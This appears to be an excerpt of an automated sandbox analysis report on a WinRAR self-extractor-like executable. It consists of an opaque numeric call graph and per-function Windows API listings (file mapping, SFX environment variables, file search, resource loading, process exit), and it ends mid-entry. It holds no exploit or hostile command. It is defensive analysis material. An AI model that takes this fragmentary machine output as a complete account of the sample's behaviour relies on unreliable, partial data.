MultiByteToWideChar 22745->22788 22789 40187c 69 API calls 22747->22789 22750 40f8f9 22749->22750 22751 40f914 22750->22751 22755 406dce RaiseException __CxxThrowException@8 22750->22755 22753 40f925 SetThreadExecutionState 22751->22753 22756 406dce RaiseException __CxxThrowException@8 22751->22756 22753->22736 22755->22751 
22756->22753 22758 403aad __EH_prolog 22757->22758 22759 403ac3 22758->22759 22760 403adf 22758->22760 22826 406d0d 67 API calls 22759->22826 22762 403d1f 22760->22762 22765 403b0b 22760->22765 22845 406d0d 67 API calls 22762->22845 22764 403ace 22764->22740 22765->22764 22790 410be0 22765->22790 22767 403b43 22794 411fa9 22767->22794 22769 403b8c 22770 403c17 22769->22770 22786 403b83 22769->22786 22829 40c57d 22769->22829 22807 40a6a9 22770->22807 22771 403b88 22771->22769 22828 401fb8 69 API calls 22771->22828 22773 403b78 22827 406d0d 67 API calls 22773->22827 22774 403b5a 22774->22769 22774->22771 22774->22773 22776 403c2a 22780 403ca5 22776->22780 22781 403c9b 22776->22781 22835 411c40 22780->22835 22811 4090d0 22781->22811 22784 403ca3 22784->22786 22844 401f18 67 API calls 22784->22844 22822 410e21 22786->22822 22787->22745 22788->22747 22789->22742 22791 410bea __EH_prolog 22790->22791 22846 40fb02 22791->22846 22793 410cea 22793->22767 22795 411fb8 22794->22795 22797 411fc2 22794->22797 22865 406e0b 68 API calls 22795->22865 22798 412002 22797->22798 22800 412007 ___std_exception_copy 22797->22800 22806 412060 ___scrt_get_show_window_mode 22797->22806 22867 4200ca RaiseException 22798->22867 22801 412117 22800->22801 22803 41203c 22800->22803 22800->22806 22868 4200ca RaiseException 22801->22868 22866 411eca 68 API calls 3 library calls 22803->22866 22804 41213a 22806->22774 22808 40a6b6 22807->22808 22810 40a6c0 22807->22810 22809 41cdae new 8 API calls 22808->22809 22809->22810 22810->22776 22812 4090da __EH_prolog 22811->22812 22869 407c6b 22812->22869 22815 40135c 69 API calls 22816 4090ec 22815->22816 22872 40c658 22816->22872 22818 409146 22818->22784 22820 40c658 115 API calls 22821 4090fe 22820->22821 22821->22818 22821->22820 22881 40c810 91 API calls __vswprintf_c_l 22821->22881 22823 410e43 22822->22823 22891 40fc30 22823->22891 22825 410e5c 22825->22764 22826->22764 22827->22786 22828->22769 22830 40c5b0 22829->22830 22831 40c59e 22829->22831 
22908 406195 73 API calls 22830->22908 22907 406195 73 API calls 22831->22907 22834 40c5a8 22834->22770 22836 411c72 22835->22836 22837 411c49 22835->22837 22843 411c66 22836->22843 22923 41421d 120 API calls 2 library calls 22836->22923 22838 411c68 22837->22838 22840 411c5e 22837->22840 22837->22843 22922 414f35 115 API calls 22838->22922 22909 415984 22840->22909 22843->22784 22844->22786 22845->22764 22862 41cdf0 22846->22862 22848 40fb0c EnterCriticalSection 22849 40fb30 22848->22849 22850 40fb4e 22848->22850 22853 41cdae new 8 API calls 22849->22853 22851 40fb95 LeaveCriticalSection 22850->22851 22852 40fb66 22850->22852 22856 40fba1 22851->22856 22855 41cdae new 8 API calls 22852->22855 22854 40fb3a 22853->22854 22854->22850 22863 40f930 71 API calls 22854->22863 22857 40fb70 22855->22857 22856->22793 22859 40fb8a LeaveCriticalSection 22857->22859 22864 40f930 71 API calls 22857->22864 22859->22856 22861 40fb88 22861->22859 22862->22848 22863->22850 22864->22861 22865->22797 22866->22806 22867->22801 22868->22804 22882 40a8e0 22869->22882 22877 40c66d __vswprintf_c_l 22872->22877 22873 40c7b7 22874 40c7df 22873->22874 22885 40c5f7 22873->22885 22876 40f8f2 2 API calls 22874->22876 22879 40c7ae 22876->22879 22877->22873 22877->22879 22889 40a791 85 API calls 22877->22889 22890 4177e7 93 API calls 22877->22890 22879->22821 22881->22821 22883 40a8f4 GetVersionExW 22882->22883 22884 407c70 22882->22884 22883->22884 22884->22815 22886 40c600 22885->22886 22888 40c651 22885->22888 22887 410680 PeekMessageW GetMessageW TranslateMessage DispatchMessageW SendDlgItemMessageW 22886->22887 22886->22888 22887->22888 22888->22874 22889->22877 22890->22877 22892 40fca2 22891->22892 22893 40fc39 EnterCriticalSection 22891->22893 22892->22825 22897 40fc57 22893->22897 22899 40fc75 22893->22899 22894 40f9d1 77 API calls 22896 40fc8f 22894->22896 22895 40fc98 LeaveCriticalSection 22895->22892 22896->22895 22897->22899 22900 40f9d1 22897->22900 22899->22894 22899->22895 22901 
40fdc9 72 API calls 22900->22901 22902 40f9f3 ReleaseSemaphore 22901->22902 22903 40fa31 DeleteCriticalSection CloseHandle CloseHandle 22902->22903 22904 40fa13 22902->22904 22903->22899 22905 40fac7 70 API calls 22904->22905 22906 40fa1d CloseHandle 22905->22906 22906->22903 22906->22904 22907->22834 22908->22834 22924 4121e6 22909->22924 22911 40c658 115 API calls 22916 415995 ___BuildCatchObject __vswprintf_c_l 22911->22916 22912 415d67 22942 413ef1 92 API calls __vswprintf_c_l 22912->22942 22914 415d77 __vswprintf_c_l 22914->22843 22916->22911 22916->22912 22928 40fa67 22916->22928 22934 412b3a 115 API calls 22916->22934 22935 415db9 115 API calls 22916->22935 22936 40fdc9 22916->22936 22940 412593 92 API calls __vswprintf_c_l 22916->22940 22941 4163f2 120 API calls __vswprintf_c_l 22916->22941 22922->22843 22923->22843 22926 4121f0 ___std_exception_copy __EH_prolog ___scrt_get_show_window_mode 22924->22926 22925 4122db 22925->22916 22926->22925 22927 406e0b 68 API calls 22926->22927 22927->22926 22929 40fa73 22928->22929 22932 40fa78 22928->22932 22930 40fbb1 77 API calls 22929->22930 22930->22932 22931 40fa91 22931->22916 22932->22931 22933 40fdc9 72 API calls 22932->22933 22933->22931 22934->22916 22935->22916 22937 40fde3 ResetEvent ReleaseSemaphore 22936->22937 22938 40fe0e 22936->22938 22939 40fac7 70 API calls 22937->22939 22938->22916 22939->22938 22940->22916 22941->22916 22942->22914 22943->22576 22944->22576 22945->22573 22947 405da6 22946->22947 22996 405cc5 22947->22996 22950 405dd9 22951 405e1a 22950->22951 22952 405e11 22950->22952 23001 40a950 CharUpperW CompareStringW CompareStringW 22950->23001 22951->22952 23002 40f0e1 CompareStringW 22951->23002 22952->22588 22955 408116 22954->22955 22956 4081b7 CharUpperW 22955->22956 22957 4081ca 22956->22957 22957->22591 22959 407c20 22958->22959 22960 407c60 22959->22960 23008 406f49 67 API calls 22959->23008 22960->22598 22962 407c58 23009 406d0d 67 API calls 22962->23009 23010 409897 22964->23010 
22967 409888 22967->22628 22970 409a23 22969->22970 22973 409a32 22969->22973 22971 409a29 FlushFileBuffers 22970->22971 22970->22973 22971->22973 22972 409aab SetFileTime 22972->22655 22973->22972 22974->22580 22975->22582 22976->22611 22977->22598 22978->22598 22979->22596 22980->22613 22981->22605 22982->22613 22984 409720 22983->22984 22985 409723 GetFileType 22983->22985 22984->22620 22986 409731 22985->22986 22986->22620 22987->22623 22988->22625 22989->22651 22990->22651 22991->22651 22992->22651 22993->22649 22994->22650 22995->22604 23003 405bc2 22996->23003 22999 405bc2 3 API calls 23000 405ce6 22999->23000 23000->22950 23001->22950 23002->22952 23005 405bcc 23003->23005 23004 405cb4 23004->22999 23004->23000 23005->23004 23007 40a950 CharUpperW CompareStringW CompareStringW 23005->23007 23007->23005 23008->22962 23009->22960 23011 40987d 23010->23011 23014 4098a3 23010->23014 23011->22967 23015 409b6a SetEndOfFile 23011->23015 23012 4098da SetFilePointer 23012->23011 23013 4098f8 GetLastError 23012->23013 23013->23011 23014->23012 23015->22967 23018 40a27d 23017->23018 23019 40a29b FindFirstFileW 23018->23019 23020 40a30d FindNextFileW 23018->23020 23023 40a2b4 23019->23023 23028 40a2f1 23019->23028 23021 40a318 GetLastError 23020->23021 23022 40a32c 23020->23022 23021->23022 23022->23028 23024 40b275 2 API calls 23023->23024 23025 40a2cd 23024->23025 23026 40a2d1 FindFirstFileW 23025->23026 23027 40a2e6 GetLastError 23025->23027 23026->23027 23026->23028 23027->23028 23028->22530 23038 418adf GetDC GetDeviceCaps ReleaseDC 23029->23038 23031 418ac7 23033 418ad3 23031->23033 23039 418b22 GetDC GetDeviceCaps ReleaseDC 23031->23039 23033->22228 23033->22229 23034->22235 23035->22238 23036->22238 23037->22241 23038->23031 23039->23033 23040->22248 23042 409ba2 67 API calls 23041->23042 23043 401ee9 23042->23043 23044 4019b1 90 API calls 23043->23044 23047 401eed 23043->23047 23045 401efa 23044->23045 23045->23047 23048 406d0d 67 API calls 23045->23048 
23047->22257 23047->22258 23048->23047 23834 41d553 46 API calls 6 library calls 23889 427ede 27 API calls _ValidateLocalCookies 23680 41cd5c 23681 41cd66 23680->23681 23682 41cabc ___delayLoadHelper2@8 19 API calls 23681->23682 23683 41cd73 23682->23683 23787 40605e 73 API calls 23835 41995f 104 API calls 23836 41955f 71 API calls 23837 418963 GdipDisposeImage GdipFree ___InternalCxxFrameHandler 23890 421f60 RtlUnwind 23789 401067 75 API calls pre_c_initialization 23719 41b077 23721 41b07c 23719->23721 23733 41aa99 _wcsrchr 23719->23733 23720 4196ec ExpandEnvironmentStringsW 23720->23733 23721->23733 23745 41b9aa 23721->23745 23723 41b642 23725 41ad86 SetWindowTextW 23725->23733 23728 4220de 22 API calls 23728->23733 23730 41ab77 SetFileAttributesW 23732 41ac32 GetFileAttributesW 23730->23732 23741 41ab6a ___scrt_get_show_window_mode 23730->23741 23734 41ac40 DeleteFileW 23732->23734 23732->23741 23733->23720 23733->23723 23733->23725 23733->23728 23736 41af50 GetDlgItem SetWindowTextW SendMessageW 23733->23736 23739 41af92 SendMessageW 23733->23739 23733->23741 23744 410b12 CompareStringW 23733->23744 23768 418b8e GetCurrentDirectoryW 23733->23768 23769 40a1a9 7 API calls 23733->23769 23772 40a132 FindClose 23733->23772 23773 419844 69 API calls ___std_exception_copy 23733->23773 23734->23741 23736->23733 23738 403f5b _swprintf 51 API calls 23740 41ac75 GetFileAttributesW 23738->23740 23739->23733 23740->23741 23742 41ac86 MoveFileW 23740->23742 23741->23730 23741->23732 23741->23733 23741->23738 23770 40b100 52 API calls 2 library calls 23741->23770 23771 40a1a9 7 API calls 23741->23771 23742->23741 23743 41ac9e MoveFileExW 23742->23743 23743->23741 23744->23733 23747 41b9b4 ___scrt_get_show_window_mode 23745->23747 23746 41bc0c 23746->23733 23747->23746 23748 41ba9f 23747->23748 23774 410b12 CompareStringW 23747->23774 23750 409dff 4 API calls 23748->23750 23751 41bab4 23750->23751 23752 41bad3 ShellExecuteExW 23751->23752 23775 40ae20 GetFullPathNameW 
GetFullPathNameW GetCurrentDirectoryW CharUpperW 23751->23775 23752->23746 23759 41bae6 23752->23759 23754 41bacb 23754->23752 23755 41bb21 23776 41be69 WaitForSingleObject PeekMessageW WaitForSingleObject 23755->23776 23756 41bb77 CloseHandle 23757 41bb85 23756->23757 23758 41bb90 23756->23758 23777 410b12 CompareStringW 23757->23777 23758->23746 23764 41bc07 ShowWindow 23758->23764 23759->23755 23759->23756 23761 41bb1b ShowWindow 23759->23761 23761->23755 23763 41bb39 23763->23756 23765 41bb4c GetExitCodeProcess 23763->23765 23764->23746 23765->23756 23766 41bb5f 23765->23766 23766->23756 23768->23733 23769->23733 23770->23741 23771->23741 23772->23733 23773->23733 23774->23748 23775->23754 23776->23763 23777->23758 23891 42d774 IsProcessorFeaturePresent 23892 41d779 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 23893 426f03 21 API calls 2 library calls 23861 420a00 6 API calls 4 library calls 23796 41d002 38 API calls 2 library calls 23839 423501 QueryPerformanceFrequency QueryPerformanceCounter 23894 42c301 21 API calls __vswprintf_c_l 23049 41d611 23050 41d61d ___scrt_is_nonwritable_in_current_image 23049->23050 23075 41d126 23050->23075 23052 41d624 23054 41d64d 23052->23054 23152 41da75 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 23052->23152 23062 41d68c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23054->23062 23086 42572c 23054->23086 23058 41d66c ___scrt_is_nonwritable_in_current_image 23059 41d6ec 23094 41db90 23059->23094 23062->23059 23153 424760 38 API calls 3 library calls 23062->23153 23070 41d718 23072 41d721 23070->23072 23154 424b67 28 API calls _abort 23070->23154 23155 41d29d 13 API calls 2 library calls 23072->23155 23076 41d12f 23075->23076 23156 41d8cb IsProcessorFeaturePresent 23076->23156 23078 41d13b 23157 420b66 23078->23157 23080 41d140 23081 41d144 23080->23081 
23166 4255b9 23080->23166 23081->23052 23084 41d15b 23084->23052 23089 425743 23086->23089 23087 41d783 _ValidateLocalCookies 5 API calls 23088 41d666 23087->23088 23088->23058 23090 4256d0 23088->23090 23089->23087 23091 4256ff 23090->23091 23092 41d783 _ValidateLocalCookies 5 API calls 23091->23092 23093 425728 23092->23093 23093->23062 23279 41dea0 23094->23279 23096 41dba3 GetStartupInfoW 23097 41d6f2 23096->23097 23098 42567d 23097->23098 23281 428558 23098->23281 23100 425686 23101 41d6fb 23100->23101 23285 4288e3 38 API calls 23100->23285 23103 41c131 23101->23103 23406 40f353 23103->23406 23107 41c150 23455 419036 23107->23455 23109 41c159 23459 410722 GetCPInfo 23109->23459 23111 41c163 ___scrt_get_show_window_mode 23112 41c176 GetCommandLineW 23111->23112 23113 41c203 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23112->23113 23114 41c185 23112->23114 23115 403f5b _swprintf 51 API calls 23113->23115 23462 41a8d4 23114->23462 23117 41c26c SetEnvironmentVariableW GetModuleHandleW LoadIconW 23115->23117 23475 419a76 LoadBitmapW 23117->23475 23120 41c193 OpenFileMappingW 23124 41c1f3 CloseHandle 23120->23124 23125 41c1ac MapViewOfFile 23120->23125 23121 41c1fd 23469 41be0a 23121->23469 23124->23113 23127 41c1ea UnmapViewOfFile 23125->23127 23128 41c1bd __vswprintf_c_l 23125->23128 23127->23124 23129 41be0a 2 API calls 23128->23129 23131 41c1d9 23129->23131 23130 41c2b3 23132 41c2c5 DialogBoxParamW 23130->23132 23131->23127 23133 41c2ff 23132->23133 23134 41c311 Sleep 23133->23134 23135 41c318 23133->23135 23134->23135 23138 41c326 23135->23138 23500 419237 CompareStringW SetCurrentDirectoryW ___scrt_get_show_window_mode 23135->23500 23137 41c345 DeleteObject 23139 41c35c DeleteObject 23137->23139 23140 41c35f 23137->23140 23138->23137 23139->23140 23141 41c390 23140->23141 23142 41c3a2 23140->23142 23501 41be69 WaitForSingleObject PeekMessageW WaitForSingleObject 23141->23501 23498 41909e 23142->23498 23144 41c396 CloseHandle 23144->23142 23146 
41c3dc 23147 424a9b GetModuleHandleW 23146->23147 23148 41d70e 23147->23148 23148->23070 23149 424bc4 23148->23149 23609 424941 23149->23609 23152->23052 23153->23059 23154->23072 23155->23058 23156->23078 23158 420b6b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23157->23158 23170 421c0e 23158->23170 23162 420b81 23163 420b8c 23162->23163 23184 421c4a DeleteCriticalSection 23162->23184 23163->23080 23165 420b79 23165->23080 23212 428ac5 23166->23212 23169 420b8f 8 API calls 3 library calls 23169->23081 23171 421c17 23170->23171 23173 421c40 23171->23173 23174 420b75 23171->23174 23185 421e85 23171->23185 23190 421c4a DeleteCriticalSection 23173->23190 23174->23165 23176 420ca6 23174->23176 23205 421d9a 23176->23205 23178 420cb0 23179 420cbb 23178->23179 23210 421e48 6 API calls try_get_function 23178->23210 23179->23162 23181 420cc9 23182 420cd6 23181->23182 23211 420cd9 6 API calls ___vcrt_FlsFree 23181->23211 23182->23162 23184->23165 23191 421c79 23185->23191 23188 421ebc InitializeCriticalSectionAndSpinCount 23189 421ea8 23188->23189 23189->23171 23190->23174 23192 421cad 23191->23192 23195 421ca9 23191->23195 23192->23188 23192->23189 23193 421ccd 23193->23192 23196 421cd9 GetProcAddress 23193->23196 23195->23192 23195->23193 23198 421d19 23195->23198 23197 421ce9 __crt_fast_encode_pointer 23196->23197 23197->23192 23199 421d41 LoadLibraryExW 23198->23199 23203 421d36 23198->23203 23200 421d75 23199->23200 23201 421d5d GetLastError 23199->23201 23200->23203 23204 421d8c FreeLibrary 23200->23204 23201->23200 23202 421d68 LoadLibraryExW 23201->23202 23202->23200 23203->23195 23204->23203 23206 421c79 try_get_function 5 API calls 23205->23206 23207 421db4 23206->23207 23208 421dcc TlsAlloc 23207->23208 23209 421dbd 23207->23209 23209->23178 23210->23181 23211->23179 23213 428ae2 23212->23213 23216 428ade 23212->23216 23213->23216 23218 4271c0 23213->23218 23214 41d783 _ValidateLocalCookies 5 API calls 23215 41d14d 23214->23215 
23215->23084 23215->23169 23216->23214 23219 4271cc ___scrt_is_nonwritable_in_current_image 23218->23219 23230 4276d6 EnterCriticalSection 23219->23230 23221 4271d3 23231 428f93 23221->23231 23223 4271f1 23246 42720d LeaveCriticalSection _abort 23223->23246 23224 4271e2 23224->23223 23244 427054 29 API calls 23224->23244 23227 4271ec 23245 42710a GetStdHandle GetFileType 23227->23245 23228 427202 ___scrt_is_nonwritable_in_current_image 23228->23213 23230->23221 23232 428f9f ___scrt_is_nonwritable_in_current_image 23231->23232 23233 428fc3 23232->23233 23234 428fac 23232->23234 23247 4276d6 EnterCriticalSection 23233->23247 23255 425e3e 20 API calls _abort 23234->23255 23237 428fcf 23243 428ffb 23237->23243 23248 428ee4 23237->23248 23238 428fb1 23256 425d1d 26 API calls _abort 23238->23256 23241 428fbb ___scrt_is_nonwritable_in_current_image 23241->23224 23257 429022 LeaveCriticalSection _abort 23243->23257 23244->23227 23245->23223 23246->23228 23247->23237 23249 425a8d _abort 20 API calls 23248->23249 23250 428ef6 23249->23250 23251 428f03 23250->23251 23258 4279a7 23250->23258 23252 4259c2 _free 20 API calls 23251->23252 23254 428f55 23252->23254 23254->23237 23255->23238 23256->23241 23257->23241 23265 427735 23258->23265 23261 4279ec InitializeCriticalSectionAndSpinCount 23263 4279d7 23261->23263 23262 41d783 _ValidateLocalCookies 5 API calls 23264 427a03 23262->23264 23263->23262 23264->23250 23266 427765 23265->23266 23269 427761 23265->23269 23266->23261 23266->23263 23267 427785 23267->23266 23270 427791 GetProcAddress 23267->23270 23269->23266 23269->23267 23272 4277d1 23269->23272 23271 4277a1 __crt_fast_encode_pointer 23270->23271 23271->23266 23273 4277f2 LoadLibraryExW 23272->23273 23274 4277e7 23272->23274 23275 42780f GetLastError 23273->23275 23278 427827 23273->23278 23274->23269 23276 42781a LoadLibraryExW 23275->23276 23275->23278 23276->23278 23277 42783e FreeLibrary 23277->23274 23278->23274 23278->23277 23280 41deb7 23279->23280 23280->23096 

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 0040F353: GetModuleHandleW.KERNEL32 ref: 0040F36B
                                                                                        • Part of subcall function 0040F353: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040F383
                                                                                        • Part of subcall function 0040F353: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0040F3A6
                                                                                        • Part of subcall function 00418B8E: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00418B96
                                                                                        • Part of subcall function 00419036: OleInitialize.OLE32(00000000), ref: 0041904F
                                                                                        • Part of subcall function 00419036: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00419086
                                                                                        • Part of subcall function 00419036: SHGetMalloc.SHELL32(004420E8), ref: 00419090
                                                                                        • Part of subcall function 00410722: GetCPInfo.KERNEL32(00000000,?), ref: 00410733
                                                                                        • Part of subcall function 00410722: IsDBCSLeadByte.KERNEL32(00000000), ref: 00410747
                                                                                      • GetCommandLineW.KERNEL32 ref: 0041C179
                                                                                      • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0041C1A0
                                                                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0041C1B1
                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0041C1EB
                                                                                        • Part of subcall function 0041BE0A: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0041BE20
                                                                                        • Part of subcall function 0041BE0A: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0041BE5C
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0041C1F4
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,00457938,00000800), ref: 0041C20F
                                                                                      • SetEnvironmentVariableW.KERNEL32(sfxname,00457938), ref: 0041C221
                                                                                      • GetLocalTime.KERNEL32(?), ref: 0041C228
                                                                                      • _swprintf.LIBCMT ref: 0041C267
                                                                                      • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0041C279
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041C27C
                                                                                      • LoadIconW.USER32(00000000,00000064), ref: 0041C293
                                                                                      • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00019B4F,00000000), ref: 0041C2E4
                                                                                      • Sleep.KERNEL32(?), ref: 0041C312
                                                                                      • DeleteObject.GDI32 ref: 0041C351
                                                                                      • DeleteObject.GDI32(?), ref: 0041C35D
                                                                                        • Part of subcall function 0041A8D4: CharUpperW.USER32(?,?,?,?,00001000), ref: 0041A92C
                                                                                        • Part of subcall function 0041A8D4: CharUpperW.USER32(?,?,?,?,?,00001000), ref: 0041A953
                                                                                      • CloseHandle.KERNEL32 ref: 0041C39C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentFileHandleVariable$Module$AddressCharCloseDeleteObjectProcUpperView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$*aD$*xE$8yE$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                      • API String ID: 985665271-3219697885
                                                                                      • Opcode ID: af5e07c1555c2c84d6a4922d59d1ff582ccac8fd217c9b701d4ae393f59e959f
                                                                                      • Instruction ID: e41d0b845445bbc80ebc21388868f98e8fc96f21f123d44e16b90050ecfd5996
                                                                                      • Opcode Fuzzy Hash: af5e07c1555c2c84d6a4922d59d1ff582ccac8fd217c9b701d4ae393f59e959f
                                                                                      • Instruction Fuzzy Hash: 8561EC75944304AFD310AB65EC45FAB77A8AB49705F00443BF941A32A2DBBC9D84C7AD

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      • FindResourceW.KERNELBASE(00000066,PNG,?,?,00419AC8,00000066), ref: 00418BE1
                                                                                      • SizeofResource.KERNEL32(00000000,75295780,?,?,00419AC8,00000066), ref: 00418BF9
                                                                                      • LoadResource.KERNEL32(00000000,?,?,00419AC8,00000066), ref: 00418C0C
                                                                                      • LockResource.KERNEL32(00000000,?,?,00419AC8,00000066), ref: 00418C17
                                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,00419AC8,00000066), ref: 00418C35
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00418C42
                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00418C62
                                                                                      • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00418C9D
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00418CB2
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00418CB9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                                                                      • String ID: PNG
                                                                                      • API String ID: 3656887471-364855578
                                                                                      • Opcode ID: 11a7bb7e9ba0bd1c6195af64aaecc2cce134a12b80e65160e9a6bb46c35eb7ad
                                                                                      • Instruction ID: 027c81f87c0e4551096a2a65dbaf1df2449b1300f4d00a981994960039cf4821
                                                                                      • Opcode Fuzzy Hash: 11a7bb7e9ba0bd1c6195af64aaecc2cce134a12b80e65160e9a6bb46c35eb7ad
                                                                                      • Instruction Fuzzy Hash: 9F219375502701AFC7219F21ED499ABBBACEF85790B00152EF845D2260EB36D840DAA9

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0040A16E,000000FF,?,?), ref: 0040A2A8
                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0040A16E,000000FF,?,?), ref: 0040A2DE
                                                                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0040A16E,000000FF,?,?), ref: 0040A2E6
                                                                                      • FindNextFileW.KERNEL32(?,?,?,?,?,?,0040A16E,000000FF,?,?), ref: 0040A30E
                                                                                      • GetLastError.KERNEL32(?,?,?,?,0040A16E,000000FF,?,?), ref: 0040A31A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$ErrorFirstLast$Next
                                                                                      • String ID:
                                                                                      • API String ID: 869497890-0
                                                                                      • Opcode ID: ee0707b88cfbf41a39d31c9d08f90c26b6fc268683a71314440f9656788be2fa
                                                                                      • Instruction ID: 9d5465c68fa34bb837becbe42a063a04a78451be81ad5d6fe627ca20fe6a8a86
                                                                                      • Opcode Fuzzy Hash: ee0707b88cfbf41a39d31c9d08f90c26b6fc268683a71314440f9656788be2fa
                                                                                      • Instruction Fuzzy Hash: 84417372604345AFC324DF64C884ADBF7E8FB49344F000A2EF999E3240D778A9648B96
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(?,?,00424A30,?,00437F68,0000000C,00424B87,?,00000002,00000000), ref: 00424A7B
                                                                                      • TerminateProcess.KERNEL32(00000000,?,00424A30,?,00437F68,0000000C,00424B87,?,00000002,00000000), ref: 00424A82
                                                                                      • ExitProcess.KERNEL32 ref: 00424A94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 1703294689-0
                                                                                      • Opcode ID: 61bf5375fc5058eb9408920b4b30729785bd6fbb779785a04af24fed71b4f404
                                                                                      • Instruction ID: 92f48a68b15b2d49dc508ca97df5ded98c263e542fe700474f32c0f20244dc61
                                                                                      • Opcode Fuzzy Hash: 61bf5375fc5058eb9408920b4b30729785bd6fbb779785a04af24fed71b4f404
                                                                                      • Instruction Fuzzy Hash: DEE04F31140114AFCF11AF14ED08A493B29EB40355F400129F80597131CB39DC42CB48
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0040840E
